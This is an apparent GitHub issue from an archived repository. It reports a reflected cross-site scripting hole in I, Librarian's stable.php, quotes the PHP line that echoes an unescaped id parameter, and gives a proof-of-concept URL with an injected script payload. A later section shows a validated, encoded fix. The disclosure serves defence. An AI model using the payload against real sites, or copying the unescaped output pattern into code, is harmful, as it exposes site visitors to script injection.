This repository was archived by the owner on Jan 27, 2023. It is now read-only.

Reflected XSS vulnerability #119

Closed
@xssssrf

Description

<a href="<?php print IL_URL; ?>?id=<?php print $_GET['id']; ?>" style="display:block">

When $stablelinks == '1' in ilibrarian-default.ini, it could cause a reflective XSS.

POC:
http://localhost/Librarian/stable.php?id="/><script>confirm(document.domain)</script>
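
One way to close the hole in the line quoted above, as an added example that is not code from the issue or from the project: validate the id, then encode it for the URL query and for the HTML attribute before printing. The function names are hypothetical, the `IL_URL` value is a constructed placeholder, and the sketch assumes a valid id is a positive decimal integer.

```php
<?php
// Added example, not the project's code. IL_URL below is a constructed placeholder.
if (!defined('IL_URL')) {
    define('IL_URL', 'http://localhost/Librarian/stable.php');
}

/**
 * Strict variant: accept only decimal ids (assumption about the id format),
 * then encode for the two contexts the value passes through.
 * Returns null when the id is rejected.
 */
function stable_link_open_tag($rawId): ?string
{
    // Rejects arrays (?id[]=x), empty strings and anything that is not all digits.
    if (!is_string($rawId) || !ctype_digit($rawId)) {
        return null;
    }
    return stable_link_open_tag_encoded($rawId);
}

/**
 * Encoding-only variant for ids that are not numeric: percent-encode the
 * value as a query component, then escape the whole URL for the attribute.
 */
function stable_link_open_tag_encoded(string $rawId): string
{
    $url  = IL_URL . '?id=' . rawurlencode($rawId);
    $href = htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<a href="' . $href . '" style="display:block">';
}

// Constructed inputs: a plain id and the payload from the PoC URL above.
$samples = ['42', '"/><script>confirm(document.domain)</script>'];

foreach ($samples as $id) {
    $strict = stable_link_open_tag($id);
    echo 'strict:  ', $strict ?? '(rejected, no link printed)', PHP_EOL;
    echo 'encoded: ', stable_link_open_tag_encoded($id), PHP_EOL;
}
```

With the PoC payload the strict variant prints no link at all, and the encoding-only variant emits the quote and angle brackets as percent escapes, so the value cannot close the `href` attribute.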
